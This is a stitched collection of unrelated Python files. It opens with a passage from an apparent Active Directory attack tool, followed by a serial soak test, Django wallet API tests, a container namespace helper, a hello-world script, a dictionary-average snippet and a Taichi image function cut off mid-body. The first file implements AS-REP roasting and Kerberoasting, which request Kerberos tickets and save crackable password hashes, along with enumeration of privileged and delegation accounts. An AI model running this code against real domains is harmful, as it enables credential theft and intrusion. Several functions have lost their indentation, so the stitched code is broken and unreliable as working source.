            self.conn = SMBConnection(self.host, self.host, None, 445)
            self.smbv1 = False
        except socket.error:
            return False
        except Exception as e:
            logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
            return False
        return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def sid_to_str(self, sid):
try:
# revision
revision = int(sid[0])
# count of sub authorities
sub_authorities = int(sid[1])
# big endian
identifier_authority = int.from_bytes(sid[2:8], byteorder='big')
# If true then it is represented in hex
if identifier_authority >= 2 ** 32:
identifier_authority = hex(identifier_authority)
# loop over the count of small endians
sub_authority = '-' + '-'.join([str(int.from_bytes(sid[8 + (i * 4): 12 + (i * 4)], byteorder='little')) for i in range(sub_authorities)])
objectSid = 'S-' + str(revision) + '-' + str(identifier_authority) + sub_authority
return objectSid
except Exception:
pass
return sid
    def check_if_admin(self):
        """Set `self.admin_privs` when the current user is (transitively) a
        member of one of the privileged domain groups."""
        # 1. get the SID prefix of the domain (from an account with the
        #    userAccountControl bit 8192 set)
        sid_domaine = ""
        searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
        attributes= ["objectSid"]
        resp = self.search(searchFilter, attributes, sizeLimit=0)
        answers = []
        # NOTE(review): resp[0][1] assumes the first result has this shape —
        # a failed search would raise here; confirm upstream handling
        for attribute in resp[0][1]:
            if str(attribute['type']) == 'objectSid':
                sid = self.sid_to_str(attribute['vals'][0])
                sid_domaine = '-'.join(sid.split('-')[:-1])
        # 2. get the DNs of the privileged groups (well-known RIDs/SIDs
        #    512 / 544 / 519, S-1-5-32-549, S-1-5-32-551)
        searchFilter = "(|(objectSid="+sid_domaine+"-512)(objectSid="+sid_domaine+"-544)(objectSid="+sid_domaine+"-519)(objectSid=S-1-5-32-549)(objectSid=S-1-5-32-551))"
        attributes= ["distinguishedName"]
        resp = self.search(searchFilter, attributes, sizeLimit=0)
        answers = []
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            for attribute in item['attributes']:
                if str(attribute['type']) == 'distinguishedName':
                    answers.append(str("(memberOf:1.2.840.113556.1.4.1941:=" + attribute['vals'][0] + ")"))
        # 3. recursive group-membership check for the current user
        #    (LDAP_MATCHING_RULE_IN_CHAIN, OID 1.2.840.113556.1.4.1941)
        searchFilter = "(&(objectCategory=user)(sAMAccountName=" + self.username + ")(|" + ''.join(answers) + "))"
        attributes= [""]
        resp = self.search(searchFilter, attributes, sizeLimit=0)
        answers = []
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            if item:
                self.admin_privs = True
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=0):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
self.logger.error('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
self.logger.error(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= ['sAMAccountName', 'description', 'badPasswordTime', 'badPwdCount', 'pwdLastSet']
resp = self.search(searchFilter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.info('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
description = ''
pwdLastSet = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
elif str(attribute['type']) == 'description':
description = str(attribute['vals'][0])
self.logger.highlight('{:<30} {}'.format(sAMAccountName, description))
except Exception as e:
self.logger.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=['name']
resp = self.search(searchFilter, attributes, 0)
if resp:
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
self.logger.highlight('{}'.format(name))
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
return
    def asreproast(self):
        """AS-REP roasting: collect crackable AS-REP hashes for accounts
        with DONT_REQUIRE_PREAUTH set, appending them to the output file."""
        # need some credential material to run the LDAP search first
        if self.password == '' and self.nthash == '' and self.kerberos == False:
            return False
        # Building the search filter: preauth not required, not disabled,
        # not a computer account
        searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
                       "(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
                       (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
        attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 0)
        if resp:
            answers = []
            self.logger.info('Total of records returned %d' % len(resp))
            for item in resp:
                if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                    continue
                mustCommit = False
                sAMAccountName = ''
                memberOf = ''
                pwdLastSet = ''
                userAccountControl = 0
                lastLogon = 'N/A'
                try:
                    for attribute in item['attributes']:
                        if str(attribute['type']) == 'sAMAccountName':
                            sAMAccountName = str(attribute['vals'][0])
                            mustCommit = True
                        elif str(attribute['type']) == 'userAccountControl':
                            userAccountControl = "0x%x" % int(attribute['vals'][0])
                        elif str(attribute['type']) == 'memberOf':
                            memberOf = str(attribute['vals'][0])
                        elif str(attribute['type']) == 'pwdLastSet':
                            if str(attribute['vals'][0]) == '0':
                                pwdLastSet = '<never>'
                            else:
                                pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                        elif str(attribute['type']) == 'lastLogon':
                            if str(attribute['vals'][0]) == '0':
                                lastLogon = '<never>'
                            else:
                                lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    if mustCommit is True:
                        answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
                except Exception as e:
                    logging.debug("Exception:", exc_info=True)
                    logging.debug('Skipping item, cannot process due to error %s' % str(e))
                    pass
            if len(answers)>0:
                for user in answers:
                    # request the AS-REP hash for each roastable account
                    hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
                    self.logger.highlight(u'{}'.format(hash_TGT))
                    with open(self.args.asreproast, 'a+') as hash_asreproast:
                        hash_asreproast.write(hash_TGT + '\n')
                return True
            else:
                self.logger.highlight("No entries found!")
            return
        self.logger.error("Error with the LDAP account used")
    def kerberoasting(self):
        """Kerberoasting: request TGS tickets for SPN-bearing user accounts
        and write crackable hashes to the output file."""
        # Building the search filter: has an SPN, normal account (512),
        # not disabled (2), not a computer account
        searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
                       "(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
        attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 0)
        if resp:
            answers = []
            self.logger.info('Total of records returned %d' % len(resp))
            for item in resp:
                if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                    continue
                mustCommit = False
                sAMAccountName = ''
                memberOf = ''
                SPNs = []
                pwdLastSet = ''
                userAccountControl = 0
                lastLogon = 'N/A'
                delegation = ''
                try:
                    for attribute in item['attributes']:
                        if str(attribute['type']) == 'sAMAccountName':
                            sAMAccountName = str(attribute['vals'][0])
                            mustCommit = True
                        elif str(attribute['type']) == 'userAccountControl':
                            userAccountControl = str(attribute['vals'][0])
                            if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
                                delegation = 'unconstrained'
                            elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
                                delegation = 'constrained'
                        elif str(attribute['type']) == 'memberOf':
                            memberOf = str(attribute['vals'][0])
                        elif str(attribute['type']) == 'pwdLastSet':
                            if str(attribute['vals'][0]) == '0':
                                pwdLastSet = '<never>'
                            else:
                                pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                        elif str(attribute['type']) == 'lastLogon':
                            if str(attribute['vals'][0]) == '0':
                                lastLogon = '<never>'
                            else:
                                lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                        elif str(attribute['type']) == 'servicePrincipalName':
                            for spn in attribute['vals']:
                                SPNs.append(str(spn))
                    if mustCommit is True:
                        if int(userAccountControl) & UF_ACCOUNTDISABLE:
                            logging.debug('Bypassing disabled account %s ' % sAMAccountName)
                        else:
                            # one answer per SPN on the account
                            for spn in SPNs:
                                answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
                except Exception as e:
                    logging.error('Skipping item, cannot process due to error %s' % str(e))
                    pass
            if len(answers)>0:
                #users = dict( (vals[1], vals[0]) for vals in answers)
                # one TGT is enough; then request a TGS per SPN
                TGT = KerberosAttacks(self).getTGT_kerberoasting()
                for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
                    try:
                        serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
                        tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
                                                                                self.kdcHost,
                                                                                TGT['KDC_REP'], TGT['cipher'],
                                                                                TGT['sessionKey'])
                        r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
                        self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
                        self.logger.highlight(u'{}'.format(r))
                        with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
                            hash_kerberoasting.write(r + '\n')
                    except Exception as e:
                        logging.debug("Exception:", exc_info=True)
                        logging.error('SPN: %s - %s' % (SPN,str(e)))
            else:
                self.logger.highlight("No entries found!")
            return
        self.logger.error("Error with the LDAP account used")
    def trusted_for_delegation(self):
        """List accounts with the TRUSTED_FOR_DELEGATION flag (524288)."""
        # Building the search filter
        searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
        attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 0)
        answers = []
        # NOTE(review): assumes `search` returned a sequence; a falsy error
        # return would make len() raise here — confirm search() error path
        logging.debug('Total of records returned %d' % len(resp))
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if str(attribute['type']) == 'sAMAccountName':
                        sAMAccountName = str(attribute['vals'][0])
                        mustCommit = True
                    elif str(attribute['type']) == 'userAccountControl':
                        userAccountControl = "0x%x" % int(attribute['vals'][0])
                    elif str(attribute['type']) == 'memberOf':
                        memberOf = str(attribute['vals'][0])
                    elif str(attribute['type']) == 'pwdLastSet':
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                if mustCommit is True:
                    answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
            except Exception as e:
                logging.debug("Exception:", exc_info=True)
                logging.debug('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers)>0:
            logging.debug(answers)
            for value in answers:
                self.logger.highlight(value[0])
        else:
            self.logger.error("No entries found!")
        return
    def password_not_required(self):
        """List accounts with PASSWD_NOTREQD (userAccountControl bit 32),
        showing whether each one is enabled or disabled."""
        # Building the search filter
        searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
        try:
            logging.debug('Search Filter=%s' % searchFilter)
            resp = self.ldapConnection.search(searchFilter=searchFilter,
                                              attributes=['sAMAccountName',
                                                          'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
                                              sizeLimit=0)
        except ldap_impacket.LDAPSearchError as e:
            if e.getErrorString().find('sizeLimitExceeded') >= 0:
                logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
                # We reached the sizeLimit, process the answers we have already and that's it. Until we implement
                # paged queries
                resp = e.getAnswers()
                pass
            else:
                return False
        answers = []
        logging.debug('Total of records returned %d' % len(resp))
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            pwdLastSet = ''
            userAccountControl = 0
            status = 'enabled'
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if str(attribute['type']) == 'sAMAccountName':
                        sAMAccountName = str(attribute['vals'][0])
                        mustCommit = True
                    elif str(attribute['type']) == 'userAccountControl':
                        # bit 2 == ACCOUNTDISABLE
                        if int(attribute['vals'][0]) & 2 :
                            status = 'disabled'
                        userAccountControl = "0x%x" % int(attribute['vals'][0])
                    elif str(attribute['type']) == 'memberOf':
                        memberOf = str(attribute['vals'][0])
                    elif str(attribute['type']) == 'pwdLastSet':
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                if mustCommit is True:
                    answers.append([sAMAccountName, memberOf, pwdLastSet, lastLogon, userAccountControl, status])
            except Exception as e:
                logging.debug("Exception:", exc_info=True)
                logging.debug('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers)>0:
            logging.debug(answers)
            for value in answers:
                self.logger.highlight("User: " + value[0] + " Status: " + value[5])
        else:
            self.logger.error("No entries found!")
        return
    def admin_count(self):
        """List objects with adminCount=1 (protected by AdminSDHolder)."""
        # Building the search filter
        searchFilter = "(adminCount=1)"
        attributes=['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
        resp = self.search(searchFilter, attributes, 0)
        answers = []
        # NOTE(review): assumes `search` returned a sequence; a falsy error
        # return would make len() raise here — confirm search() error path
        logging.debug('Total of records returned %d' % len(resp))
        for item in resp:
            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
                continue
            mustCommit = False
            sAMAccountName = ''
            memberOf = ''
            pwdLastSet = ''
            userAccountControl = 0
            lastLogon = 'N/A'
            try:
                for attribute in item['attributes']:
                    if str(attribute['type']) == 'sAMAccountName':
                        sAMAccountName = str(attribute['vals'][0])
                        mustCommit = True
                    elif str(attribute['type']) == 'userAccountControl':
                        userAccountControl = "0x%x" % int(attribute['vals'][0])
                    elif str(attribute['type']) == 'memberOf':
                        memberOf = str(attribute['vals'][0])
                    elif str(attribute['type']) == 'pwdLastSet':
                        if str(attribute['vals'][0]) == '0':
                            pwdLastSet = '<never>'
                        else:
                            pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                    elif str(attribute['type']) == 'lastLogon':
                        if str(attribute['vals'][0]) == '0':
                            lastLogon = '<never>'
                        else:
                            lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
                if mustCommit is True:
                    answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
            except Exception as e:
                logging.debug("Exception:", exc_info=True)
                logging.debug('Skipping item, cannot process due to error %s' % str(e))
                pass
        if len(answers)>0:
            logging.debug(answers)
            for value in answers:
                self.logger.highlight(value[0])
        else:
            self.logger.error("No entries found!")
        return
|
"""
Soak test for transport layer
"""
from logging import DEBUG, FileHandler
from random import randrange
from struct import unpack
from time import time
from min import MINTransportSerial, min_logger
MIN_PORT = '/dev/tty.usbmodem1421'
def bytes_to_int32(data: bytes, big_endian=True) -> int:
    """Decode exactly 4 bytes into an unsigned 32-bit integer.

    Args:
        data: the 4-byte buffer to decode.
        big_endian: decode as big-endian when True (default), else little-endian.

    Returns:
        The decoded unsigned 32-bit value.

    Raises:
        ValueError: if *data* is not exactly 4 bytes long.
    """
    if len(data) != 4:
        # Fixed typo in the error message ("shoud" -> "should").
        raise ValueError("int32 should be exactly 4 bytes")
    # '>I' / '<I' = unsigned 32-bit big- / little-endian (struct format chars).
    fmt = '>I' if big_endian else '<I'
    return unpack(fmt, data)[0]
def wait_for_frames(min_handler: MINTransportSerial, timeout=3.0):
    """Poll *min_handler* until at least one frame arrives.

    Returns the non-empty list of received frames, or raises TimeoutError
    after *timeout* seconds without any frame.
    """
    deadline = time() + timeout
    frames = min_handler.poll()
    while not frames:
        if time() > deadline:
            raise TimeoutError
        frames = min_handler.poll()
    return frames
def soak_test():
    """Endlessly send random frame batches over MIN and verify the echoes.

    Requires an echoing MIN target attached at MIN_PORT.  Runs forever;
    raises AssertionError on a mismatched echo and TimeoutError on a stall.
    """
    min_handler = MINTransportSerial(port=MIN_PORT, loglevel=DEBUG)
    # Deliberately inject transport errors to stress the retransmission logic.
    min_handler.fake_errors = True
    min_log_handler = FileHandler('min.log')
    min_logger.addHandler(min_log_handler)
    # Tell the target that we are resetting to start a session
    min_handler.transport_reset()
    while True:
        # Send up to 10 frames in a batch
        batch_len = randrange(10) + 1
        min_ids = []
        payloads = []
        print("Sending a batch of length {}".format(batch_len))
        # Cap the combined payload size of one batch at 512 bytes.
        total_payload_size = 512
        for run in range(batch_len):
            min_id = randrange(0x40)
            payload_size = min(total_payload_size, randrange(256))
            total_payload_size -= payload_size
            payload = bytes([randrange(256) for i in range(payload_size)])
            min_ids.append(min_id)
            payloads.append(payload)
            # Send a frame on the serial line
            print(">>>>>>>>>>>>>>>> Sending ID={} payload len={}".format(min_id, payload_size))
            min_handler.queue_frame(min_id=min_id, payload=payload)
        while True:
            # Wait for the frames to come back
            for frame in wait_for_frames(min_handler):
                print(">>>>>>>>>>>>>>>> Got frame min_id={}, payload len={}".format(frame.min_id, len(frame.payload)))
                # Echoes must come back in FIFO order: compare with the oldest sent.
                if frame.min_id != min_ids[0]:
                    raise AssertionError("Failed: did not get back the MIN ID we sent")
                if frame.payload != payloads[0]:
                    raise AssertionError("Failed: did not get back the payload we sent")
                del min_ids[0]
                del payloads[0]
                print("Remaining: {}".format(len(min_ids)))
            if len(min_ids) == 0:
                print("Batch received back OK")
                # Breaks only the inner wait loop; the outer loop sends a new batch.
                break
if __name__ == "__main__":
soak_test() |
# Copyright 2019-2020 Alexander Polishchuk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from decimal import Decimal
import pytest
from django import urls
from django_obm import models
class TestCurrencyViewSet:
    """Unit tests for the currency endpoints (node calls are mocked)."""
    @staticmethod
    @pytest.mark.django_db
    @pytest.mark.usefixtures("bitcoin_currency", "ethereum_currency")
    def test_get(client):
        """Both fixture currencies are returned by the list endpoint."""
        resp = client.get(urls.reverse("currency-list"))
        assert resp.status_code == 200
        assert len(resp.json()) == 2
    @staticmethod
    @pytest.mark.django_db
    def test_get_estimate_fee(monkeypatch, client, node):
        """The endpoint relays the fee estimated by the (mocked) node."""
        monkeypatch.setattr(
            models.Node,
            "estimate_fee",
            lambda *_, **__: 0.0001,
        )
        payload = {
            "currency": node.connector.currency,
            "to_address": "fake",
            "amount": "11"
        }
        resp = client.post(urls.reverse("currency-estimate-fee"), data=payload)
        assert resp.status_code == 200
        assert resp.json()["estimated_fee"] == 0.0001
@pytest.mark.integration
class TestCurrencyViewSetIntegration:
    """Fee estimation against a live node (integration runs only)."""
    @staticmethod
    @pytest.mark.django_db
    def test_get_estimate_fee(client, node):
        # Destination comes from the environment; presumably exported by the
        # integration harness -- confirm GETH_IN_WALLET_ADDRESS is set.
        ethereum_tx = {
            "currency": node.connector.currency,
            "to_address": str(os.environ.get("GETH_IN_WALLET_ADDRESS")),
            "amount": "10",
        }
        response = client.post(
            urls.reverse("currency-estimate-fee"),
            data=ethereum_tx,
        )
        assert response.status_code == 200
        result = response.json()
        # Only the type is asserted: a live fee value is not deterministic.
        assert isinstance(result["estimated_fee"], float)
class TestAddressViewSet:
    """Unit tests for the address endpoints (node calls are mocked)."""
    @staticmethod
    @pytest.mark.django_db
    def test_get(client):
        """An empty database yields an empty address list."""
        resp = client.get(urls.reverse("address-list"))
        assert resp.status_code == 200
        assert resp.json() == []
    @staticmethod
    @pytest.mark.django_db
    def test_post(monkeypatch, client, node):
        """POST creates one Address whose value comes from the node."""
        monkeypatch.setattr(
            models.Node, "create_address", lambda *_, **__: "fake-addr",
        )
        resp = client.post(
            urls.reverse("address-list"),
            data={"currency": node.connector.currency},
        )
        assert resp.status_code == 201
        assert models.Address.objects.count() == 1
        body = resp.json()
        assert body["value"] == "fake-addr"
        if node.name == 'geth':
            assert body["password"] == ""
@pytest.mark.integration
class TestAddressViewSetIntegration:
    """Address creation against a live node (integration runs only)."""
    @staticmethod
    @pytest.mark.django_db
    def test_post(client, node):
        response = client.post(
            urls.reverse("address-list"),
            data={"currency": node.connector.currency},
        )
        assert response.status_code == 201
        assert models.Address.objects.count() == 1
        result = response.json()
        # Only shape is asserted: a real node generates an arbitrary address.
        assert isinstance(result["value"], str)
        assert len(result["value"]) > 20
        if node.name == 'geth':
            assert result["password"] == ""
class TestTransactionViewSet:
    """Unit tests for the transaction endpoints (node calls are mocked)."""
    @staticmethod
    @pytest.mark.django_db
    @pytest.mark.usefixtures("bitcoin_transaction")
    def test_get(client):
        """A single stored transaction is returned by the list endpoint."""
        resp = client.get(urls.reverse("transaction-list"))
        assert resp.status_code == 200
        assert len(resp.json()) == 1
    @staticmethod
    @pytest.mark.django_db
    def test_get_empty(client):
        """An empty database yields an empty transaction list."""
        resp = client.get(urls.reverse("transaction-list"))
        assert resp.status_code == 200
        assert resp.json() == []
    @staticmethod
    @pytest.mark.django_db
    def test_post(monkeypatch, client, node):
        """POST sends via the (mocked) node and persists the result."""
        monkeypatch.setattr(
            models.Node,
            "send_transaction",
            lambda *_, **__: {
                "fee": 0.000001,
                "txid": "fake-txid",
                "timestamp": 1562415913,
                "amount": 0.00001,
            },
        )
        # TODO: Add fee handling
        request_data = {
            "currency": node.connector.currency,
            "to_address": "fake-addr",
            "amount": 10,
        }
        resp = client.post(urls.reverse("transaction-list"), data=request_data)
        assert resp.status_code == 201
        assert models.Transaction.objects.count() == 1
        body = resp.json()
        assert body["txid"] == "fake-txid"
        assert Decimal(body["fee"]) == Decimal("0.000001")
@pytest.mark.integration
class TestTransactionViewSetIntegration:
    """Transaction sending against live nodes (integration runs only)."""
    @staticmethod
    @pytest.mark.django_db
    def test_post_with_subtract_fee_from_amount(client, node):
        # Per-currency request payloads; addresses come from the environment,
        # presumably exported by the integration harness -- verify they are set.
        data_mapping = {
            "bitcoin": {
                "currency": "bitcoin",
                "to_address": os.environ.get("BITCOIN_CORE_IN_WALLET_ADDRESS"),
                "amount": Decimal('0.00001'),
            },
            "ethereum": {
                "currency": "ethereum",
                "from_address": os.environ.get("GETH_SEND_FROM_ADDRESS"),
                "to_address": os.environ.get("GETH_IN_WALLET_ADDRESS"),
                "amount": Decimal('0.00003'),
                # TODO: Create new addr with default password
                "password": "abc",
            },
        }
        response = client.post(
            urls.reverse("transaction-list"),
            data=data_mapping[node.connector.currency],
        )
        amount = data_mapping[node.connector.currency]["amount"]
        assert response.status_code == 201
        assert models.Transaction.objects.count() == 1
        result = response.json()
        # With subtract-fee semantics, sent amount + fee equals the request amount.
        assert Decimal(result["amount"]) + Decimal(result["fee"]) == amount
        assert isinstance(result["txid"], str)
        assert len(result["txid"]) > 20
    @staticmethod
    @pytest.mark.django_db
    @pytest.mark.usefixtures("geth_node")
    def test_post_without_password_to_ethereum_address(
        client, ethereum_address
    ):
        amount = 0.0000001
        response = client.post(
            urls.reverse("transaction-list"),
            data={
                "currency": "ethereum",
                "from_address": ethereum_address.value,
                "to_address": os.environ.get("GETH_IN_WALLET_ADDRESS"),
                "amount": 0.0000001,
                "subtract_fee_from_amount": False,
            },
        )
        assert response.status_code == 201
        assert models.Transaction.objects.count() == 1
        result = response.json()
        # Fee is not subtracted here, so the sent amount must match exactly.
        assert float(result["amount"]) == amount
        assert float(result["fee"])
        assert isinstance(result["txid"], str)
        assert len(result["txid"]) > 20
|
# -*- coding: utf-8 -*-
"""Basic unshare for udocker maintenance"""
import os
import ctypes
import subprocess
from udocker.msg import Msg
from udocker.helper.hostinfo import HostInfo
from udocker.helper.nixauth import NixAuthentication
class Unshare(object):
    """Place a process in new Linux namespaces via libc unshare(2)."""

    # Clone flags from <linux/sched.h> selecting which namespaces to create.
    CLONE_NEWNS = 0x20000
    CLONE_NEWUTS = 0x4000000
    CLONE_NEWIPC = 0x8000000
    CLONE_NEWUSER = 0x10000000
    CLONE_NEWPID = 0x20000000
    CLONE_NEWNET = 0x40000000

    def unshare(self, flags):
        """Call libc unshare(2) with *flags*.

        Returns True on success, False on failure (error is logged).
        """
        try:
            # use_errno=True so the real errno of the failed call can be
            # reported below via ctypes.get_errno().
            _libc = ctypes.CDLL("libc.so.6", use_errno=True)
        except OSError:
            Msg().err("Error: in unshare: mapping libc")
            return False
        _unshare = _libc.unshare
        _unshare.restype = ctypes.c_int
        _unshare.argtypes = (ctypes.c_int, )
        if _unshare(flags) == -1:
            # Bug fix: previously reported os.strerror(-1), which is not the
            # errno of the failed call; report the captured errno instead.
            Msg().err("Error: in unshare:", os.strerror(ctypes.get_errno()))
            return False
        return True

    def namespace_exec(self, method, flags=CLONE_NEWUSER):
        """Fork and run *method* as (namespace-)root inside new namespaces.

        The parent writes the child's uid/gid maps via newuidmap/newgidmap;
        the child unshares, waits for the maps, switches to uid/gid 0 and
        calls method(), exiting with its integer return value.

        Returns:
            bool: in the parent, True if the child exited cleanly with
            status 0; False otherwise.
        """
        (pread1, pwrite1) = os.pipe()   # child -> parent: "ready for id maps"
        (pread2, pwrite2) = os.pipe()   # parent -> child: "id maps written"
        cpid = os.fork()
        if cpid:
            os.close(pwrite1)
            os.read(pread1, 1)  # wait until the child has unshared
            user = HostInfo().username()
            # Map host uid -> 0 inside the namespace, then the subordinate ranges.
            newidmap = ["newuidmap", str(cpid), "0", str(HostInfo.uid), "1"]
            for (subid, subcount) in NixAuthentication().user_in_subuid(user):
                newidmap.extend(["1", subid, subcount])
            subprocess.call(newidmap)
            # NOTE(review): the gid map is seeded from HostInfo.uid — confirm
            # that HostInfo.gid is not what was intended here.
            newidmap = ["newgidmap", str(cpid), "0", str(HostInfo.uid), "1"]
            for (subid, subcount) in NixAuthentication().user_in_subgid(user):
                newidmap.extend(["1", subid, subcount])
            subprocess.call(newidmap)
            os.close(pwrite2)  # notify child that the id maps are in place
            (dummy, status) = os.waitpid(cpid, 0)
            if status % 256:
                # Non-zero low byte: the child did not exit cleanly.
                Msg().err("Error: namespace exec action failed")
                return False
            return True
        else:
            self.unshare(flags)
            os.close(pwrite2)
            os.close(pwrite1)  # notify parent that unshare has happened
            os.read(pread2, 1)  # wait for the parent to write the id maps
            try:
                os.setgid(0)
                os.setuid(0)
                os.setgroups([0, 0, ])
            except OSError:
                Msg().err("Error: setting ids and groups")
                return False
            # pylint: disable=protected-access
            os._exit(int(method()))
        return False
|
'''
Amresh
Tripathy '''
import flask
print ('Hello world') |
# Find the average of the keys of a dictionary.
dic = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
# Iterating a dict yields its keys, so sum()/len() averages them directly.
# This also avoids shadowing the builtins `sum` and the manual counter loop.
average = sum(dic) / len(dic)
print('Average is', average)
from io import BytesIO
import numpy as np
from taichi.core import ti_core as _ti_core
import taichi as ti
def cook_image_to_bytes(img):
    """Normalize a NumPy array or Taichi field into a uint8 image array.

    Wide unsigned integers are rescaled into [0, 255]; floats are clipped
    to [0, 1] and rounded into [0, 255]; uint8 passes through unchanged.
    Greyscale input gains a trailing channel axis.  The result is
    transposed/flipped for the image writers.  Used by ti.imwrite and
    ti.imdisplay.
    """
    if not isinstance(img, np.ndarray):
        img = img.to_numpy()
    dtype = img.dtype
    if dtype in (np.uint16, np.uint32, np.uint64):
        # Scale wide unsigned ints down to the uint8 range.
        img = (img // (np.iinfo(dtype).max // 256)).astype(np.uint8)
    elif dtype in (np.float32, np.float64):
        # Clip to [0, 1] and round to the nearest byte value.
        img = (np.clip(img, 0, 1) * 255.0 + 0.5).astype(np.uint8)
    elif dtype != np.uint8:
        raise ValueError(f'Data type {dtype} not supported in ti.imwrite')
    assert len(img.shape) in (2, 3), "Image must be either RGB/RGBA or greyscale"
    if len(img.shape) == 2:
